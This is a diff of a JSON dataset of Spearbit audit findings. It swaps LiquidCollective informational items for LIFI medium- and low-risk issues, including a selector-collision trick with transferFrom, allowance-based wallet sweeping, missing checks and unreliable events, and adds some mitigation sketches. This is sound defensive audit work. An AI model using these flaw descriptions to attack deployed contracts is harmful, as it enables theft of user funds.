- "title": "OperatorResolution.active might be a redundant struct field which can be removed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The value of active stays true once it has been set true for a given index. This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator which does not override values for already registered names.", + "title": "Improve dexAllowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grants more access than necessary. This is important because multiple functions can have the same signature. For example, these two functions have the same signature: gasprice_bit_ether(int128) transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd Note: brute forcing an innocent looking function is straightforward. The transferFrom() is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. If someone gets a dex whitelisted which contains a function with the same signature, then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ... 
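// Sketch of a stricter scheme (assumed storage layout, not the current one):
// key the selector allowlist per contract, so a signature is only valid for
// the dex it was approved for, and compare only the 4 selector bytes:
//   mapping(address => mapping(bytes4 => bool)) dexFuncAllowlist;
//   if (!appStorage.dexFuncAllowlist[currentSwapData.callTo][bytes4(currentSwapData.callData[:4])])
//       revert ContractCallNotAllowed();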
} }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "tors[selectedOperatorIndex].keys. Since the places that the limit has been set with a value other than 0 has checks against going above keys bound: operators[selectedOperatorIndex].limit is always less than or equal OperatorsRegistry.1.sol#L250-L252 if (_newLimits[idx] > operator.keys) { revert OperatorLimitTooHigh(_newLimits[idx], operator.keys); } OperatorsRegistry.1.sol#L324-L326 if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } OperatorsRegistry.1.sol#L344-L346 52 if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; }", + "title": "Pulling tokens by LibSwap.swap() is counterintuitive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can pull in multiple different tokens. It also doesnt detect accidentally sending of native tokens with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back less tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user to sign a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out his entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the \"pull\" functionality is not needed and can even result in additional issues. In Executor.sol it tries to \"pull\" tokens from \"msg.sender\" itself. In the best case of ERC20 implementations (like OpenZeppeling, Solmate) this has no effect. However some non standard ERC20 imple- mentations might break. 27 contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - ,! initialSendingAssetBalance : 0; ... 
if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Use LibAsset.depositAsset() before doing", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "The unused constant DELTA_BASE can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The constant DELTA_BASE in BeaconReportBounds is never used.", + "title": "Too many bytes are checked to verify the function selector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeSwaps() slices the callData with 8 bytes. The function selector is only 4 bytes. Also see the docs. So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; ... // could be bytes4 }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Remove unused modifiers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifier active(uint256 _index) is not used in the project.", + "title": "Check address(self) isn't accidentally whitelisted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are several access control mechanisms. If they somehow would allow address(self) then risks would increase as there are several ways to call arbitrary functions. library LibAccess { function addAccess(bytes4 selector, address executor) internal { ... accStor.execAccess[selector][executor] = true; } } contract AccessManagerFacet { function setCanExecute(...) external { ... _canExecute ? LibAccess.addAccess(_selector, _executor) : LibAccess.removeAccess(_selector, _executor); } } contract DexManagerFacet { function addDex(address _dex) external { ... dexAllowlist[_dex] = true; ... } function batchAddDex(address[] calldata _dexs) external { dexAllowlist[_dexs[i]] = true; ... ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Modifier names do not follow the same naming patterns", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifier names do not follow the same naming patterns in OperatorsRegistry.", + "title": "Verify anyswap token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If the _anyswapData.token would be malicious then tokens can be stolen. Note, this is relevant if the LiFi contracts are called directly without using the API. function _startBridge(...) ... { ... 
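// Sketch of a mitigation (tokenAllowlist is a hypothetical mapping,
// analogous to the existing dexAllowlist), checked before any router call:
//   if (!tokenAllowlist[_anyswapData.token]) revert ContractCallNotAllowed();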
IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token,...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ... IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent that values it holds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take.", + "title": "More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesn't check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].receivingAssetId == DAI). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "riverAddress can be renamed to river and we can avoid extra interface casting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "riverAddress's name suggest that it is only an address. Although it is an address with the IRiverV1 attached to it. Also, we can avoid unnecessary casting of interfaces.", + "title": "Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "_startBridge() in AmarokFacet.sol and NXTPFacet.sol sets user-provided receiver and call data for the destination chain. The receiver is intended to be the LifiDiamond contract address on the destination chain. The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAndCompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed, which will lead to stuck (and stolen) funds on the destination chain. Since the addresses and functions are already known, the contract can pass this data to Connext itself instead of taking it from the user.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Define named constants for numeric literals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In _sanitychecks there 2 numeric literals 10000 and 365 days used: uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) ... 
if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {", + "title": "Check output of swap is equal to amount bridged", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The result of the swap (amount) isn't always checked to be the same as the bridged amount (_bridgeData.amount). This way tokens could stay in the LiFi Diamond if more tokens are received with a swap than bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... _startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Move memberIndex and ReportsPositions checks at the beginning of the OracleV1.reportBeacon function.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon after quite a few calculations are done.", + "title": "Missing timelock logic on the DiamondCut facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the LiFi Diamond, any facet address/function selector can be changed by the contract owner. In Connext, Diamond changes should go through a proposal window with a delay of 7 days. function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document what incentivizes the operators to run their validators when globalFee is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If GlobalFee could be 0, then neither the treasury nor the operators earn rewards. What factor would motivate the operators to keep their validators running?", + "title": "Data from emit LiFiTransferStarted() can't be relied on", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Most of the functions do an emit like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can do transactions to the LiFi bridge directly and supply wrong data for the emit. For example: transfer a lot of Doge coins and in the emit say they are transferring wrapped BTC. Then the statistics would say a large amount of volume has been transferred, while in reality it is negligible. The advantage of using a blockchain is that the data is (seen as) reliable. 
If the data isn't reliable, it isn't worth the trouble (gas cost) to store it in a blockchain and it could just be stored in an offline database. The result of this is that it's not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also, any kickback fees to integrators or referrers cannot be based on this data because it is unreliable. Also, user interfaces & dashboards could display the wrong information. function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document how Alluvial plans to prevent institutional investors and operators get into business directly and bypass using the River protocol.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Since the list of operators and also depositors can be looked up from the information on-chain, what would prevent Institutional investors (users) and the operators to do business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario?", + "title": "Missing emit in XChainExecFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function swapAndCompleteBridgeTokens of Executor does do an emit LiFiTransferCompleted, while the comparable function in XChainExecFacet doesn't do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document how operator rewards will be distributed if OperatorRewardsShare is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If OperatorRewardsShare could be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Sidenote: Other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. 
Related: Avoid to waste gas distributing rewards when the number of shares to be distributed is zero", + "title": "Different access control to withdraw funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWithdraw() and withdraw(). Both have different access controls on them. executeCallAndWithdraw() can be called by the owner or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). withdraw() can only be called by the owner. If the function signature of executeCallAndWithdraw() clashes with an approved signature in the execAccess mapping, the approved address can steal all the funds in the LifiDiamond contract.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Current operator reward distribution does not favor more performant operators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Reward shares are distributed based on the fraction of the active funded non-stopped validators owned by an operator. This distribution of shares does not promote the honest operation of validators to the fullest extent. Since the oracle members don't report the delta in the balance of each validator, it is not possible to reward operators/validators that have been performing better than the rest. Also if a high-performing operator or operators were the main source of the beacon balance sum and if they had enough ETH to initially deposit into the ETH2.0 deposit contract on their own, they could have made more profit that way versus joining as an operator in the River protocol.", + "title": "Use internal where possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several functions have an access control where the msg.sender is compared to address(this), which means they can only be called from the same contract. In the current code, with the various generic call mechanisms, this isn't a safe check. For example, the function _execute() from Executor.sol can circumvent this check. Luckily the functions where this has been used have a low risk profile, so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "TRANSFER_MASK == 0 which causes a no-op.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "TRANSFER_MASK is a named constant defined as 0 (River.1.sol#L37). Like the other masks DEPOSIT_- MASK and DENY_MASK which supposed to represent a bitmask, on the first look, you would think TRANSFER_MASK would need to also represent a bitmask. But if you take a look at _onTransfer: function _onTransfer(address _from, address _to) internal view override { IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK); // this call reverts if unauthorized or denied IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK); // this call reverts if unauthorized or denied ,! ,! 
} This would translate into calling onlyAllowed with the: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(x, 0); Now if we look at the onlyAllowed function with these parameters: function onlyAllowed(x, 0) external view { uint256 userPermissions = Allowlist.get(x); if (userPermissions & DENY_MASK == DENY_MASK) { revert Denied(_account); } if (userPermissions & 0 != 0) { // <--- ( x & 0 != 0 ) == false revert Unauthorized(_account); } } Thus if the _from, _to addresses don't have their DENY_MASK set to 1 they would not trigger a revert since we would never step into the 2nd if block above when TRANSFER_MASK is passed to these functions. The TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK ,! IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in ,! `_onTransfer`", + "title": "Event of transfer is not emitted in the AxelarFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The usage of the LiFi protocol depends largely on the off-chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these changes on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although other facets emit the LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ... {} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Reformat numeric literals with many digits for better readability.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Reformat numeric literals with many digits into a more readable form.", + "title": "Improve checks on the facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the facets, receiver/destination address and amount checks are missing. The symbol parameter is used to get the address of a token with the gateway's tokenAddresses function. The tokenAddresses function gets the token address from a mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check if the given symbol exists or not. contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacet are missing receiver address/amount checks. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... 
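// Sketch of the missing validations (error names are illustrative):
//   if (_cBridgeData.receiver == address(0)) revert InvalidReceiver();
//   if (_cBridgeData.amount == 0) revert InvalidAmount();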
} } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { _hopData.recipient, ... ... } } contract HyphenFacet { function _startBridge(...) ... { _hyphenData.recipient ... ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Firewall should follow the two-step approach present in River when transferring govern address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract. 1) Propose a new owner storing the address in a pendingAdmin variable 2) The pending admins accept the new role by actively calling acceptOwnership This approach makes this crucial action much safer because 1) Prevent the admin to transfer ownership to address(0) given that address(0) cannot call acceptOwnership 2) Prevent the admin to transfer ownership to an address that cannot \"admin\" the contract if they cannot call acceptOwnership. For example, a contract do not have the implementation to at least call acceptOwnership. 3) Allow the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet The current implementation does not follow this safe approach, allowing the governor to directly transfer the gov- ernor role to a new address.", + "title": "Use keccak256() instead of hex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different it is better to use the same format everywhere. If they would use the same value then the variables stored on that location could interfere with each other and the LiFi Diamond could start to behave unreliably. ReentrancyGuard.sol: ... NAMESPACE = hex\"a6...\"; AxelarFacet.sol: ... NAMESPACE = hex\"c7...\"; // keccak256(\"com.lifi.facets.axelar\") OwnershipFacet.sol: ... NAMESPACE = hex\"cf...\"; // keccak256(\"com.lifi.facets.ownership\"); PeripheryRegistryFacet.sol: ... NAMESPACE = hex\"dd...\"; // keccak256(\"com.lifi.facets.periphery_registry\"); StargateFacet.sol: ... NAMESPACE = keccak256(\"com.lifi.facets.stargate\"); LibAccess.sol: ... ACCESS_MANAGEMENT_POSITION = hex\"df...\"; // keccak256(\"com.lifi.library.access.management\") LibDiamond.sol: ... DIAMOND_STORAGE_POSITION = keccak256(\"diamond.standard.diamond.storage\");", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of removeValidators allow an admin or node operator to remove val- idators, passing to the function the list of validator's index to be removed. Note that the list of indexes must be ordered DESC. 
At the end of the function, we can see these checks if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } That reset the operator's limit to the lower index value (this to prevent that a not approved key get swapped to a position inside the limit). The issue with this implementation is that it is not considering the case where all the operator's validators are already approved by Alluvial. In this case, if an operator removes the validator with the lower index, all the other validators get de-approved because the limit will be set to the lower limit. Consider this scenario: 59 op.limit = 10 op.keys = 10 op.funded = 0 This mean that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial call removeValidators([validatorIndex], [0]) removing the validator at index 0 this will swap the validator_10 with validator_0. set the limit to 0 because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were \"safe\" (because approved by Alluvial) the limit is now 0 meaning that all the validators are not \"safe\" anymore and cannot be selected by pickNextValidators.", + "title": "Remove redundant Swapper.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are two versions of Swapper.sol (Swapper.sol and SwapperV2.sol) which are functionally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from \"../Helpers/Swapper.sol\"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Consider renaming transferOwnership to better reflect the function's logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of transferOwnership is not really transferring the ownership from the current admin to the new one. The function is setting the value of the Pending Admin that must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership.", + "title": "Use additional checks for transferFrom()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts are not covering edge cases like non-standard ERC20 tokens that do not revert on failed transfers: some ERC20 implementations don't revert if the balance is insufficient but return false. Other functions transfer tokens without checking if the amount of tokens received is equal to the amount of tokens requested. This is relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... 
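// Sketch of a safer pattern (using OpenZeppelin's SafeERC20 plus a balance
// check; illustrative, not the current implementation):
//   uint256 balanceBefore = IERC20(tokenAddress).balanceOf(to);
//   SafeERC20.safeTransferFrom(IERC20(tokenAddress), from, to, amount);
//   if (IERC20(tokenAddress).balanceOf(to) - balanceBefore != amount) revert InvalidAmount();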
IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on return code & amount of tokens } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Wrong return name used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The min function returns the minimum of the 2 inputs, but the return name used is max.", + "title": "Move code to check amount of tokens transferred to library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The following piece of code is present in Facet.sol, OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. However, it doesn't check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Discrepancy between architecture and code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The architecture diagram states that admin triggers deposits on the Consensus Layer Deposit Man- ager, but the depositToConsensusLayer() function allows anyone to trigger such deposits.", + "title": "Fuse pools are not whitelisted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of the pool is not checked. Because Fuse is a permissionless framework, an attacker can create a fake pool, and through this contract a user can be tricked into the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {}", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Consider replacing the remaining require with custom errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In the vast majority of the project contracts have defined and already use Custom Errors that provide a better UX, DX and gas saving compared to require statements. 
